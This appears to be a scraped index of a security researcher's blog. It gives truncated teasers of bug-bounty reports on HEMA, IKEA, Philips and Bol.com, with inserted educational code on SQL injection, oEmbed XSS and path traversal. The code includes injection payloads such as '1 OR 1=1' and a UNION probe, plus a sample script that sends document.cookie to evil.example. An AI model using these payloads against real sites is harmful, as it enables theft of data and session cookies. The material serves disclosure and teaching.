Proof of concept. The username of the database user starts with ‘hema’.

Background
These days almost every website uses a database. Whenever a visitor requests data from the site, the server application formulates a query and sends it to the database; the query language is usually SQL. When constructing that query the server application has to take the access level of the requesting user into account: it should return only the data that user is allowed to see.

But what if there is a flaw somewhere in this process that allows you to manipulate the query that is sent to the database? You may end up with thousands of…
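To make the two paragraphs above concrete, here is an added example (mine, not the author's code and not taken from the Hema.nl report) of the pattern that makes such manipulation possible. The orders table, the customer names and the payload strings are all constructed for the demonstration; the access check `customer = '...'` lives only inside the query text, so a hostile `order_id` can rewrite the WHERE clause and even smuggle server metadata into the result set with a UNION, which is the same kind of probe as the "database user starts with hema" proof of concept. The parameterized version sends the values separately from the SQL and is not affected.

```python
import sqlite3

# Constructed stand-in for the site's database (not the page's own data):
# an orders table where each row belongs to one customer.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE orders (id INTEGER, customer TEXT, item TEXT);
        INSERT INTO orders VALUES
            (1, 'alice', 'appeltaart'),
            (2, 'alice', 'rookworst'),
            (3, 'bob',   'kaars');
    """)
    return conn

def orders_vulnerable(conn, customer, order_id):
    """Access control exists only as text in the query.  Because order_id
    is spliced into that text, a hostile value can rewrite the WHERE
    clause and drop the customer restriction entirely."""
    sql = ("SELECT id, customer, item FROM orders "
           f"WHERE customer = '{customer}' AND id = {order_id}")
    return conn.execute(sql).fetchall()

def orders_safe(conn, customer, order_id):
    """Parameterized query: the driver transmits the values separately from
    the SQL, so order_id is only ever compared as a value, never parsed
    as part of the statement."""
    sql = "SELECT id, customer, item FROM orders WHERE customer = ? AND id = ?"
    return conn.execute(sql, (customer, order_id)).fetchall()

# Payloads an attacker would try in the order_id parameter (constructed).
# "1 OR 1=1": AND binds tighter than OR, so the customer check is bypassed.
BYPASS_PAYLOAD = "1 OR 1=1"
# A UNION with a matching column count appends a row of server metadata;
# sqlite_version() stands in for the "current database user" probe.
UNION_PAYLOAD = "0 UNION SELECT 1, sqlite_version(), 'leaked'"

if __name__ == "__main__":
    db = make_db()
    print("legit  :", orders_vulnerable(db, "alice", 1))
    print("bypass :", orders_vulnerable(db, "alice", BYPASS_PAYLOAD))
    print("union  :", orders_vulnerable(db, "alice", UNION_PAYLOAD))
    print("safe   :", orders_safe(db, "alice", BYPASS_PAYLOAD))
```

Note that the safe version does not "clean" the payload; it simply compares the integer column against the string `1 OR 1=1`, which matches nothing. That is the property you want: the query structure is fixed at the time the SQL text is written, not at request time.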


Proof of concept. Above the browser. Below a private slack channel displaying the credentials.

Background
Reflected XSS bugs are great fun to find; they are everywhere, and the impact can be big if the injected payload is carefully crafted.

Today we will try to find a reflected XSS bug and craft a custom payload for it. We will run into some restrictions and find workarounds for them.

Hema.nl
One of the most indispensable brands in the Netherlands is HEMA. HEMA is famous for its worst (sausage), its appeltaart (apple pie) and its variety stores, which can be found nearly everywhere in the Netherlands.


Proof of concept

Background
With a market share of around 60%, WordPress is currently the most used CMS. Out of the box WordPress is just a blog, but by installing plugins you can turn it into a webshop, a crowdfunding platform or even a mind reader.

Anyone can create and publish a WordPress plugin. There is no quality control; all you have to go on are the reviews from other users. …


Proof of concept

Background
Previously we discussed XSS, open redirect bugs and unrestricted file uploads. Today we will focus on email content spoofing.

Phishing someone is much easier if we can send emails from the servers of a well-known brand. The email looks legitimate and is digitally signed by the sending domain (DKIM), so it won't be flagged as spam or phishing. Perfect.

IKEA.com
As mentioned in our previous bug report, IKEA is a nice brand with a proper responsible disclosure statement, so we're safe to help them find bugs, maybe even in exchange for a reward ;-)!


Proof of concept

Background
Previously we discussed a Local File Inclusion bug at IKEA.com; that bug was quite complicated and showed that you have to think outside the box to exploit it.

This time we will see how a relatively simple, easy-to-spot bug can have a high impact: a potential leak of customer data.

Plenty of high-profile brands use Salesforce for Customer Relationship Management (CRM); it is well suited to customer care. It is also easy to integrate into your own website through the Salesforce API.

IKEA.com
As mentioned in our previous…


Proof of concept

Are you aware of any (private) bug bounty programs? I would love to get an invite. Please get in touch with me: Jonathan@Protozoan.nl

Background
In my previous report we learned about a special type of persistent XSS attack: the unvalidated oEmbed attack. It allows us to inject our own HTML and JavaScript by manipulating the oEmbed functionality.

oEmbed is an open format for embedding content from one website in another. Almost all media-rich platforms support the oEmbed standard; for example, it lets you easily add a Vimeo video to your WordPress blog
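An added example of what "unvalidated" means on the consumer side (my code, not the author's and not taken from WordPress or any oEmbed provider). The provider answers an oEmbed request with JSON; for `photo` responses that is a `url` plus `width`/`height`, for `video` and `rich` responses it is ready-made `html`, and `link` responses carry only metadata. A consumer that drops the returned `html` straight into its page lets whoever controls the endpoint inject markup and script. The validated version trusts provider markup only from an allowlist of endpoint hosts (the allowlist, the host names and all sample responses below are constructed assumptions), builds `<img>` tags itself from escaped values, and degrades everything else to an escaped link.

```python
import html
import json
from urllib.parse import urlparse

# Assumption (not from the page): endpoint hosts whose provider-supplied
# `html` the consumer is willing to render verbatim.
TRUSTED_HTML_PROVIDERS = {"vimeo.com", "www.youtube.com"}

def _is_http(url):
    return urlparse(url).scheme in ("http", "https")

def render_unvalidated(response_json):
    """The pattern behind an unvalidated oEmbed bug: whatever `html` the
    endpoint returned is dropped straight into the page."""
    data = json.loads(response_json)
    if data.get("html"):
        return data["html"]
    return '<a href="%s">%s</a>' % (data.get("url", ""), data.get("title", ""))

def render_validated(endpoint_host, requested_url, response_json):
    """Render an oEmbed response without trusting its markup.

    endpoint_host : host of the endpoint we actually fetched, taken from our
                    own request (never from provider_url in the response,
                    which the attacker controls)
    requested_url : the URL the user asked to embed
    response_json : raw JSON text from the endpoint (untrusted)
    """
    data = json.loads(response_json)
    kind = data.get("type")
    title = html.escape(str(data.get("title") or requested_url))

    # Fallback for anything we do not trust: a plain, escaped link.
    if _is_http(requested_url):
        safe_link = '<a href="%s">%s</a>' % (html.escape(requested_url, quote=True), title)
    else:
        safe_link = title

    if kind == "photo":
        url = str(data.get("url", ""))
        if not _is_http(url):              # rejects javascript: / data: sources
            return safe_link
        return '<img src="%s" width="%d" height="%d" alt="%s">' % (
            html.escape(url, quote=True),
            int(data.get("width", 0)), int(data.get("height", 0)),
            html.escape(str(data.get("title", ""))))

    if kind in ("video", "rich") and endpoint_host in TRUSTED_HTML_PROVIDERS:
        return str(data.get("html", ""))   # provider markup, trusted host only

    # `link` responses, unknown types, and html from any other host.
    return safe_link

# Constructed sample responses (not captured from any real provider).
MALICIOUS_RICH = json.dumps({"type": "rich", "version": "1.0",
    "html": "<script>location='https://evil.example/?c='+document.cookie</script>"})
PHOTO = json.dumps({"type": "photo", "version": "1.0",
    "url": "https://img.example/a.jpg", "width": 640, "height": 480,
    "title": "Cat & dog"})
BAD_PHOTO = json.dumps({"type": "photo", "version": "1.0",
    "url": "javascript:alert(1)", "width": 1, "height": 1})
TRUSTED_VIDEO = json.dumps({"type": "video", "version": "1.0",
    "html": '<iframe src="https://player.vimeo.com/video/1"></iframe>',
    "width": 640, "height": 360})

if __name__ == "__main__":
    print(render_unvalidated(MALICIOUS_RICH))
    print(render_validated("evil.example", "https://evil.example/post/1", MALICIOUS_RICH))
    print(render_validated("img.example", "https://img.example/p/1", PHOTO))
```

The important design choice is that the trust decision is keyed on the host the consumer itself connected to. Discovery links in an attacker's page can point at any endpoint, and the JSON body can claim any `provider_name` or `provider_url`, so neither is usable as the basis for trusting `html`.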


Proof of concept


Background
In one of our previous reports we learned about reflected XSS; the downside of that attack is that we need to trick a user into visiting a prepared URL.

But what if we can store our JavaScript code inside the page itself?

The impact is much larger: no special URLs involved and no XSS auditors ruining our game. We call this a stored or persistent XSS attack. As you may remember, we had success…


Proof of concept


Background
With a local file inclusion (LFI) attack you trick the server into serving its private files: think of the configuration, log and source code files of the website. Sometimes it can even lead to remote code execution. LFI attacks are therefore considered high impact.

Most LFI attacks are caused by code that dynamically loads images or other files. If the requested filename or path is not properly validated it will serve you…
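An added example of the file-loading pattern just described and of the check that closes it (my code, not the author's and not from the IKEA.com report). The sandbox it builds is constructed: an images directory with one file that is meant to be served and a sibling file standing in for `/etc/passwd` that is not. The vulnerable loader joins the user-supplied name onto the directory as-is, so `../` walks out of it and an absolute path replaces it outright; the hardened loader resolves the final target (symlinks and `..` included) and refuses anything whose resolved path is not under the resolved base directory. It assumes a POSIX filesystem.

```python
import os
import tempfile

# Constructed file contents (not from the page).
IMAGE_BYTES = b"\x89PNG fake image bytes"
SECRET_BYTES = b"root:x:0:0:root:/root:/bin/bash\n"   # stands in for /etc/passwd

def build_sandbox():
    """Create <tmp>/images/logo.png (meant to be served) and <tmp>/secret.txt
    (never meant to be served). Returns the images directory."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    images = os.path.join(root, "images")
    os.mkdir(images)
    with open(os.path.join(images, "logo.png"), "wb") as f:
        f.write(IMAGE_BYTES)
    with open(os.path.join(root, "secret.txt"), "wb") as f:
        f.write(SECRET_BYTES)
    return images

def serve_unvalidated(images_dir, requested):
    """The vulnerable pattern: the request parameter is joined onto the
    images directory unchanged. '../secret.txt' walks out of it, and
    os.path.join discards the base entirely for an absolute path."""
    with open(os.path.join(images_dir, requested), "rb") as f:
        return f.read()

def is_inside(images_dir, requested):
    """True only if the fully resolved target still lies under the resolved
    base directory. Comparing resolved paths component-wise (commonpath)
    also rejects '/srv/images2/x' for a base of '/srv/images'."""
    base = os.path.realpath(images_dir)
    target = os.path.realpath(os.path.join(base, requested))
    return os.path.commonpath([base, target]) == base

def serve_validated(images_dir, requested):
    """Hardened loader: resolve first, then check, then open the resolved
    path (not the original string) so symlinks cannot redirect the read.
    Python's open() additionally rejects embedded NUL bytes, which older
    path-truncation tricks relied on."""
    if not is_inside(images_dir, requested):
        raise PermissionError("refusing %r: outside the images directory" % requested)
    base = os.path.realpath(images_dir)
    with open(os.path.realpath(os.path.join(base, requested)), "rb") as f:
        return f.read()

if __name__ == "__main__":
    images = build_sandbox()
    print("vulnerable, ../secret.txt ->", serve_unvalidated(images, "../secret.txt"))
    print("validated,  logo.png      ->", serve_validated(images, "logo.png"))
    try:
        serve_validated(images, "../secret.txt")
    except PermissionError as e:
        print("validated,  ../secret.txt ->", e)
```

Blocklisting `../` in the input string is the common but weaker fix: encoded forms, redundant separators and symlinks inside the base directory all get past a string filter, whereas comparing resolved paths handles them uniformly.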


Proof of concept


Background
As we learned in previous reports, XSS attacks can have a high impact: you can steal cookies, attack the visitor's browser or use the bug to phish for login credentials.

Today we will look at a reflected XSS attack in Adobe Experience Manager (AEM) that bypasses the Web Application Firewall (WAF) and results in a fully working phishing login.

Philips
As always, we need to find a proper target for our attack…


Proof of concept (the contents of the server file /etc/passwd are loaded into the offer description field)


Background
In the previous reports we learned about executing code in a visitor's browser: reflected XSS and stored XSS. We also had a quick look at misconfigured server settings and open redirects.

Today we will take a closer look at stealing private files from a server.

Picking a target
As always we need a good target. One of the biggest e-commerce websites in the Netherlands is Bol.com. The way they handled my…

Jonathan Bouman

Medical doctor / Web developer / Security researcher - https://Protozoan.nl
